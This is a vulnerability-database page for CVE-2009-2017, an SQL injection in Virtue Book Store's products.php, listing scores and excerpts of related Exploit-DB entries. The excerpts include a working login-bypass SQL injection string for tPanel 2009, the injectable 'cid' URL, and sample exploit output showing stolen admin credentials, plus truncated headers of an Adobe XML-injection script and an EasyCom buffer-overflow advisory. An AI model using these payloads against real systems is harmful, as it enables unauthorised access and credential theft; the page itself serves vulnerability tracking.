CVE-2009-2017
published 2009-06-09CVE-2009-2017: SQL injection vulnerability in products.php in Virtue Book Store allows remote attackers to execute arbitrary SQL commands via the cid parameter.
PriorityP341high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.01%
58.8th percentile
SQL injection vulnerability in products.php in Virtue Book Store allows remote attackers to execute arbitrary SQL commands via the cid parameter.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
tPanel 2009 - Authentication Bypass
exploitdb·2017-10-30·CVSS 9.8
CVE-2017-15974 [CRITICAL] tPanel 2009 - Authentication Bypass
tPanel 2009 - Authentication Bypass
---
# # # # #
# Exploit Title: tPanel 2009 - Authentication Bypass
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://www.datacomponents.net/
# Software Link: http://www.datacomponents.net/products/hosting/tpanel/
# Demo: http://demo.datacomponents.net/tpanel/
# Version: 2009
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15974
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
#
# http://localhost/[PATH]/login.php
#
# User: 'or 1=1 or ''=' Pass: anything
#
# Etc..
# # # # #
Exploit-DB
Adobe (Multiple Products) - XML Injection File Content Disclosure
exploitdb·2017-04-07
CVE-2009-3960 Adobe (Multiple Products) - XML Injection File Content Disclosure
Adobe (Multiple Products) - XML Injection File Content Disclosure
---
#!/bin/bash
#
# Exploit Title: Adobe XML Injection file content disclosure
# Date: 07-04-2017
# Exploit Author: Thomas Sluyter
# Website: https://www.kilala.nl
# Vendor Homepage: http://www.adobe.com/support/security/bulletins/apsb10-05.html
# Version: Multiple Adobe products
# Tested on: Windows Server 2003, ColdFusion 8.0 Enterprise
# CVE : 2009-3960
#
# Shell script that let's you exploit a known XML injection vulnerability
# in a number of Adobe products, allowing you to read files that are otherwise
# inaccessible. In Metasploit, this is achieved with auxiliary:scanner:adobe_xml_inject
# This script is a Bash implementation of the PoC multiple/dos/11529.txt.
#
# According to the original Metasploit code, this atta
Exploit-DB
EasyCom For PHP 4.0.0 - Buffer Overflow (PoC)
exploitdb·2017-02-22·CVSS 9.8
CVE-2017-5358 [CRITICAL] EasyCom For PHP 4.0.0 - Buffer Overflow (PoC)
EasyCom For PHP 4.0.0 - Buffer Overflow (PoC)
---
[+] Credits: John Page AKA Hyp3rlinX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/EASYCOM-PHP-API-BUFFER-OVERFLOW.txt
[+] ISR: ApparitionSec
Vendor:
easycom-aura.com
Product:
EASYCOM AS400 (iBMI) PHP API
EasycomPHP_4.0029.iC8im2.exe
EASYCOM is the middleware which provides native access to IBMi data and programs. With its excellent performance and strict compliance
with IBMi security regulations, this technology facilitates development of Internet, mobile and client/server applications in
Windows, Linux, and IBMi.
EasyCom tested here requires older version of PHP.
Setup test environment:
Windows 7
XAMPP 1.7.3
PHP 5.3.1 (cli) (built: Nov 20 2009 17:26:32)
Copyright (c) 1997-2009 The
Exploit-DB
Virtue Book Store - 'cid' SQL Injection
exploitdb·2009-06-08
CVE-2009-2017 Virtue Book Store - 'cid' SQL Injection
Virtue Book Store - 'cid' SQL Injection
---
CMS : Online Book Store
WEB : http://www.virtuenetz.com/book/
Archivo : products.php
Variable Tipo : GET
valor : cid
Tipo : SQL Injection
URL : http://www.site.com/products.php?cid=[SQLI]
Exploit :
Ejemplo :
undersec@Undersec:~/Escritorio$ php exploit.php http://www.virtuenetz.com/book/
ID :1
Usuario : admin
Password : admin
Gretz :
C1c4tr1z(voodoo-labs.org),Nobody,1995,Lix (arrivalsec.wordpress.com),NanoNRoses,Codebreak(?),Nork And All Friends of Undersecurity.net.
100% CHILE
WWW.UNDERSECURITY.NET
# milw0rm.com [2009-06-08]
2009-06-09
Published